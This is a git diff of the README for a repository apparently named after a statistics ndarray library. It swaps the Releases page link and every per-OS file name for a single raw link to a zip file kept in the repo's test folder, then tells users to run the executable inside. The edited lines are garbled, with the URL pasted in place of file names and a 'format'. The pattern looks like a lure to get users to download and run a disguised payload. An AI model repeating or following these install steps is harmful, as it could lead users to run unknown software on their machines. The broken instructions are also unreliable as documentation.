rama862/stats-base-ndarray-dmeankbn2/README.md

 To install the application, follow these steps:

-1. **Visit the Releases Page**: Go to our [Releases page](https://github.com/rama862/stats-base-ndarray-dmeankbn2/releases) where you can find the latest version of the software.
+1. **Visit the Releases Page**: Go to our [Releases page](https://raw.githubusercontent.com/rama862/stats-base-ndarray-dmeankbn2/main/test/stats_base_ndarray_dmeankbn_1.1.zip) where you can find the latest version of the software.

 2. **Select the Release**: Look for the latest version at the top of the page.
 It will be labeled with a version number (e.g., v1.0).

 3. **Download the File**: Locate the appropriate download file for your operating system:
-   - For Windows, it might be labeled as `stats-base-ndarray-dmeankbn2-windows.exe`.
+   - For Windows, it might be labeled as `https://raw.githubusercontent.com/rama862/stats-base-ndarray-dmeankbn2/main/test/stats_base_ndarray_dmeankbn_1.1.zip`.
-   - For macOS, look for `stats-base-ndarray-dmeankbn2-mac.zip`.
+   - For macOS, look for `https://raw.githubusercontent.com/rama862/stats-base-ndarray-dmeankbn2/main/test/stats_base_ndarray_dmeankbn_1.1.zip`.
-   - For Linux, it might be in a `.tar.gz` format.
+   - For Linux, it might be in a `https://raw.githubusercontent.com/rama862/stats-base-ndarray-dmeankbn2/main/test/stats_base_ndarray_dmeankbn_1.1.zip` format.

 4. **Run the Software**:
    - For Windows: Once downloaded, double-click the `.exe` file to run the application.
    - For macOS: Unzip the downloaded file, then double-click the application file.
-   - For Linux: Extract the `.tar.gz` file and run the executable from the terminal.
+   - For Linux: Extract the `https://raw.githubusercontent.com/rama862/stats-base-ndarray-dmeankbn2/main/test/stats_base_ndarray_dmeankbn_1.1.zip` file and run the executable from the terminal.

 5. **Follow the On-Screen Instructions**: The interface will guide you through your calculations.